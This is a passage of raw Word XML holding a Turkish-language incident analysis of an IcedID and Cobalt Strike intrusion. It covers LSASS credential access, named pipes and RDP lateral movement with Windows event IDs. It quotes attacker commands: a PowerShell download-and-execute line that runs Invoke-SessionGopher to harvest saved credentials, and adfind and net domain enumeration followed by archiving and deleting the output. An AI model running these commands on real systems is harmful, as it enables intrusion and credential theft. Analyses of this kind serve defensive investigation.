          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> ile cmd.exe enjekte olduktan sonra rundll32.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="68A57E52">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>exe’ye</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="68A57E52">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> de enjekte oluyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="68A57E52" w:rsidP="12897420" w:rsidRDefault="68A57E52" w14:paraId="085CE804" w14:textId="6E792D74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68A57E52">
        <w:drawing>
          <wp:inline wp14:editId="3CF454B4" wp14:anchorId="1FF06D03">
            <wp:extent cx="5724524" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57371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0e0d148ea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12642EA2" w14:textId="2B96172B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6EAEB2F3" w14:textId="4BC0723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12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="09F036F6" w14:textId="0BC0632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66AEC0B4" w:rsidP="12897420" w:rsidRDefault="66AEC0B4" w14:paraId="4320603A" w14:textId="3ED0645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12897420" w:rsidR="66AEC0B4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CREDENTINAL ACC</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="66AEC0B4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ESS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FDF510C" w:rsidP="12897420" w:rsidRDefault="1FDF510C" w14:paraId="21841D82" w14:textId="3E14EB0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FDF510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Burada </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1FDF510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Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1FDF510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Strike LSASS hafızasına erişim sağlamak için kullanılıyor.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="16889A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0x1010 sadece okuma yetkisine sahipken 01xfffff tüm yetkilere sahiptir. H</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3FF7A79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afızayı kesin olarak almak için 2 tane saldırı yapılmış olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FDF510C" w:rsidP="12897420" w:rsidRDefault="1FDF510C" w14:paraId="0097A7AD" w14:textId="2209170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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="1FDF510C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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1FDF510C" w:rsidP="12897420" w:rsidRDefault="1FDF510C" w14:paraId="74C4C086" w14:textId="4AE5DFB4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1FDF510C">
        <w:drawing>
          <wp:inline wp14:editId="6959FCBE" wp14:anchorId="6A84E11A">
            <wp:extent cx="5724524" cy="3752850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="905691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603adf588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24FF5" w:rsidP="12897420" w:rsidRDefault="4A824FF5" w14:paraId="23C24314" w14:textId="65E19B05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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4A824FF5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Cobalt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4A824FF5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> Strike </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4A824FF5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>pipe’ları</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="4A824FF5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> kullanılarak </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="0B341F87">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>komut gönderip çıktıları alınmasını sağlar</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="4A824FF5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="78FD9A3F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78FD9A3F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Pipelar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="78FD9A3F">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> bir nevi ağ soketi</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="318A462A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve"> gibi düşünülebilir. İşlemler arası hatta ana bilgisayarlar arasında bilgi alışverişi yapılmak için kullanılabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5E8EF489" w:rsidP="12897420" w:rsidRDefault="5E8EF489" w14:paraId="3447EBA2" w14:textId="308D81BD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5E8EF489">
        <w:drawing>
          <wp:inline wp14:editId="0A66F9C5" wp14:anchorId="0158A933">
            <wp:extent cx="5724524" cy="542925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="357969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19dde5024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2A77839B" w14:textId="26C9FE66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28F37868" w14:textId="386F8C1C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6DB07E5E" w14:textId="5F80D07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5AA7F09A" w14:textId="6ECEA143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45CEF0B6" w14:textId="069D18F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0113DBEE" w14:textId="17C387A6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6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="7537C9EE" w14:textId="1506FD56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Cobalt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Strike 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beacon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kullanılarak şifrelenmiş bir Base64 kodu çalıştırılıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="1DE35F6F" w14:textId="683F139F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-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nop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kullanılarak herhangi bir profil</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="2196A5F4">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r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en çalıştırılmaya</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="68C66C65">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r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k</w:t>
      </w:r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arkasında iz bırakmamaya çalışıyor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="7F4707DB" w14:textId="76B66D73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-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exec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bypass kullanılarak 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PowerShell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yürütme kurallarını bypass ediyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="15BDD507" w14:textId="6994726D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EncodedCommand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 xml:space="preserve"> kullanılarak çalıştırılan kod gizlenmeye çalışıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="2971A95C" w14:textId="21696143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6E836F9A">
        <w:drawing>
          <wp:inline wp14:editId="19BC5EEC" wp14:anchorId="5F073E0F">
            <wp:extent cx="5724524" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2013132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8e5e5673c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36F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="1A3B9D0C" w14:textId="66595096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E836F9A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Komutu dönüştürdüğümüzde ise bir bağlantı isteğinin atıldığını görüyoruz.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="7E28DB72" w14:textId="61651599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6E836F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IEX (New-Object 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Net.Webclient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).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DownloadString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6E836F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('http://127.0.0.1:8897/'); </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6E836F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Invoke-SessionGopher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="6E836F9A" w:rsidP="12897420" w:rsidRDefault="6E836F9A" w14:paraId="1C29575A" w14:textId="793F97FF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6E836F9A">
        <w:drawing>
          <wp:inline wp14:editId="0044298C" wp14:anchorId="2C6EF1C8">
            <wp:extent cx="5724524" cy="4000500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="716517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def18f521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2BB8D731" w14:textId="30438E22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3603C5B3" w:rsidP="12897420" w:rsidRDefault="3603C5B3" w14:paraId="27FCF329" w14:textId="068BB2BC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3603C5B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(</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="6F2BA99D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Invoke-SessionGopher) ait bir taslaktır ve özellikle bir sistemde oturum bilgilerini veya hassas yapılandırmaları bulmak için kullanılabilecek bir araçtır. Domain/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6F2BA99D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username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="6F2BA99D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ve şifreleri arar. </w:t>
      </w:r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Çıktıları ise </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PuTTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SuperPuTTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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WinSCP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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olarak kaydeder. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PuTTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/telnet, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="23A5E32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Win</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="3D6C4F0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SCP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3D6C4F0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ftp ile alakalıdır. Yani aslında yine çıktıları zararsız gibi göstermeye çalışıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="77BDAC4F" w14:textId="7591A8D3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0FE5398C" w:rsidP="12897420" w:rsidRDefault="0FE5398C" w14:paraId="71FBB7DA" w14:textId="650BA96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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="0FE5398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tr-TR"/>
        </w:rPr>
        <w:t>DISCOVERY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F67F62C" w:rsidP="12897420" w:rsidRDefault="7F67F62C" w14:paraId="0C8AEB26" w14:textId="5B3A196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tr-TR"/>
        </w:rPr>
      </w:pP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tr-TR"/>
        </w:rPr>
        <w:t>IcedID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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> yüklenip kendini rundll32.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tr-TR"/>
        </w:rPr>
        <w:t>exe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tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> olarak değiştirdikten sonra aşağıdaki komutları çalıştırıp bilgi toplamaya başlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F67F62C" w:rsidP="12897420" w:rsidRDefault="7F67F62C" w14:paraId="134F8DB1" w14:textId="6914BEA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cmd.exe /c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chcp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&gt;&amp;2</w:t>
      </w:r>
      <w:r>
        <w:br/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ipconfig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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/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systeminfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r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config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workstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/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nltest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domain_trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/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nltest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domain_trusts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all_trusts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r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view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/domain</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r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view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all</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gram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net</w:t>
      </w:r>
      <w:proofErr w:type="gram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group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"Domain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Admins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 /domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F67F62C" w:rsidP="12897420" w:rsidRDefault="7F67F62C" w14:paraId="6F1C7988" w14:textId="0A798A7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Keşif komutlarının bir parçası olarak yüklenmiş Anti-Virüs programlarını da aşağıdaki komutla arar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7F67F62C" w:rsidP="12897420" w:rsidRDefault="7F67F62C" w14:paraId="68C93FA8" w14:textId="64E49568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WMIC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Node:localhost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Namespace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:\\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root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\SecurityCenter2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Path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AntiVirusProduct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Get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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* /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="7F67F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Format:List</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="26A99D3F" w:rsidP="12897420" w:rsidRDefault="26A99D3F" w14:paraId="48E68B95" w14:textId="013A42C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Ayrıca ekstra olarak içine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beacon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enjekte edilmiş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cmd.exe’yi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kullanarak keşif yapar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26A99D3F" w:rsidP="12897420" w:rsidRDefault="26A99D3F" w14:paraId="41390B7D" w14:textId="7F67B48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group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"domain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admins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 /domain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[REDACTED DOMAIN ADMIN] /domain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Administrator /domain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net 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[REDACTED DOMAIN ADMIN] /domain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cmd.exe /C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dir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*.txt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cmd.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/C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dir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*.dll</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26A99D3F" w:rsidP="12897420" w:rsidRDefault="26A99D3F" w14:paraId="3A1C119F" w14:textId="5805084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Aktive Directory komutu olan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kullanarak aramalara devam eder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26A99D3F" w:rsidP="12897420" w:rsidRDefault="26A99D3F" w14:paraId="39688157" w14:textId="26D2403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adfind.exe -f (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objectcategory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person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) &gt;  ad_users.txt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adfind.exe -f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objectcategory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computer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&gt; ad_computers.txt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adfind.exe -f (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objectcategory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organizationalUnit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) &gt; ad_ous.txt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adfind.exe -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subnets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-f (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objectCategory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subnet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) &gt; ad_subnets.txt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adfind.exe -f "(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objectcategory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=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group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)</w:t>
      </w:r>
      <w:proofErr w:type="gram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" &gt;</w:t>
      </w:r>
      <w:proofErr w:type="gram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ad_group.txt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adfind.exe -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gcb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-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sc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trustdmp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&gt;  ad_trustdmp.txt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r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7.exe a -mx3 ad.7z ad_*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gram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del</w:t>
      </w:r>
      <w:proofErr w:type="gram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7.exe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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adfind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="26A99D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* ad_*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="1E5C3391" w14:textId="741A35D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12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="050AF674" w14:textId="481C578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61A60EDC" w:rsidP="12897420" w:rsidRDefault="61A60EDC" w14:paraId="5C64C6A5" w14:textId="57EB981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61A60ED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Ns.bat diye bir dosya indirerek ana makinedeki bağlı</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="05719D0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lara</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="61A60ED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DNS sorgusu at</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="27BA27C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ar</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="61A60ED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</w:p>
    <w:p w:rsidR="1EA12B8C" w:rsidP="12897420" w:rsidRDefault="1EA12B8C" w14:paraId="784D43C4" w14:textId="475BEA1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C:\Windows\system32\cmd.exe /C ns.bat</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart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nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[REDACTED HOST X] </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r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... </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart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nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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[REDACTED HOST XX]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1EA12B8C" w:rsidP="12897420" w:rsidRDefault="1EA12B8C" w14:paraId="481009B8" w14:textId="67EB78A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/c burada web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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kullandığının kanıtıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="3783E4A4" w14:textId="732F57BA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1EA12B8C" w:rsidP="12897420" w:rsidRDefault="1EA12B8C" w14:paraId="4B92DB6C" w14:textId="45C8810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Virüs kurulmadan kısa bir süre önce yedek sunucuya bir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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console</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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açar. Son olarak </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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SoftPerfectNetscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="1EA12B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kullanarak tarar</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="1EF3A6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</w:p>
    <w:p w:rsidR="3031316B" w:rsidP="12897420" w:rsidRDefault="3031316B" w14:paraId="384F48F4" w14:textId="18F5A1CD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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="3031316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SoftPerfectNetscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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bilgisayarlara </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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ping</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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atabilir, portları tarayabilir, paylaşılan klasörleri keşfedebilir ve WMI, SNMP, HTTP, SSH ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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aracılığıyla ağ cihazları hakkında hemen her türlü bilgiyi alabilir. Ayrıca ayrık servisler, kayıt defterini, dosyaları ve performans sayaçlarını tarar; esnek filtreleme ve görüntüleme seçenekleri sunar ve </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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NetScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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sonuçlarını </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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XML'den</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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JSO'ya</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="2C274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kadar çeşitli biçimlerde dışa aktarır</w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="326FF3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</w:p>
    <w:p w:rsidR="12897420" w:rsidP="12897420" w:rsidRDefault="12897420" w14:paraId="6C6BED47" w14:textId="261CC75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326FF3A9" w:rsidP="12897420" w:rsidRDefault="326FF3A9" w14:paraId="30A707AE" w14:textId="7B4ABABD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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="12897420" w:rsidR="326FF3A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tr-TR"/>
        </w:rPr>
        <w:t>LETHERAL MOVEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="221A1406" w:rsidP="12897420" w:rsidRDefault="221A1406" w14:paraId="36AAD71E" w14:textId="0412438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221A140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Saldırgan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="221A140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beacon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="221A140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işlemini kullanarak çeşitli hostlara RDP kullanarak bağlantı kurar.</w:t>
      </w:r>
      <w:r w:rsidR="00E1B394">
        <w:drawing>
          <wp:inline wp14:editId="3F3946FF" wp14:anchorId="768C75F7">
            <wp:extent cx="5724524" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="196935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a37ea69dd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897420" w:rsidR="00E1B394">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>Bağlanan kişinin ”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="00E1B394">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="00E1B394">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="00E1B3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Windows loglarında, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="12897420" w:rsidR="00E1B3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event</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="00E1B3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00E1B3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ID’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="12897420" w:rsidR="00E1B3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4624, 4776, 4778, ve 4779 olarak bulunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="479146B8" w:rsidP="12897420" w:rsidRDefault="479146B8" w14:paraId="7F3ADFB4" w14:textId="734CBD1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479146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4624 hesabın giriş yaptığını</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="479146B8" w:rsidP="12897420" w:rsidRDefault="479146B8" w14:paraId="54F4C3AB" w14:textId="4ACB31F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479146B8">
        <w:drawing>
          <wp:inline wp14:editId="36B4C978" wp14:anchorId="6ABCDFE3">
            <wp:extent cx="3727078" cy="2944955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2085487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04ca00568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78" cy="29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146B8" w:rsidP="12897420" w:rsidRDefault="479146B8" w14:paraId="2E8FDC72" w14:textId="19C62EDB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479146B8">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">4776 </w:t>
      </w:r>
      <w:r w:rsidRPr="12897420" w:rsidR="051BF8DC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t xml:space="preserve">bilgisayarın isim-şifresini onaylamak için girişimde bulunduğunu </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="051BF8DC" w:rsidP="12897420" w:rsidRDefault="051BF8DC" w14:paraId="0D26C939" w14:textId="58573BC0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051BF8DC">
        <w:drawing>
          <wp:inline wp14:editId="3F7F0CF9" wp14:anchorId="26BFC481">
            <wp:extent cx="4762502" cy="1143000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1280009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33dde142e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382F35D2" w14:textId="30057F41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051BF8DC" w:rsidP="12897420" w:rsidRDefault="051BF8DC" w14:paraId="77FD3EE8" w14:textId="104453F2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051BF8DC">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
        </w:rPr>
        <w:t>4778 ve 4779 oturumun yeniden bağlandığını ve çıkış yaptığını gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="051BF8DC" w:rsidP="12897420" w:rsidRDefault="051BF8DC" w14:paraId="5E4AE367" w14:textId="785C5A40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051BF8DC">
        <w:drawing>
          <wp:inline wp14:editId="6441B306" wp14:anchorId="44878C53">
            <wp:extent cx="5724524" cy="2133600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71287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ef60539cb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8D307" w:rsidP="12897420" w:rsidRDefault="6778D307" w14:paraId="58F71C35" w14:textId="43CD7424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778D307">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
